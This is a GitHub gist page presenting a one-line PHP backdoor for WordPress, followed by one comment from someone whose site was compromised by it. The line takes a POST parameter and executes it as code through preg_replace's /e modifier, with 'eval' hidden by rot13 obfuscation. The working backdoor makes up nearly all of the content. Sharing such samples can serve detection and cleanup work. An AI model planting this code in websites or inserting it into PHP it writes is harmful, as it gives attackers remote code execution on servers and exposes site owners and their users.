Last active
February 23, 2016 16:04
-
-
Save jonaslejon/350379e43ddd5f563dba to your computer and use it in GitHub Desktop.
One-liner WordPress PHP Backdoor with rot13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
($WordPress = $_POST['Wp']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($WordPress)', 'add'); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
My website was compromised with this script, I have cleaned it but couldn't identify the reason how it got in.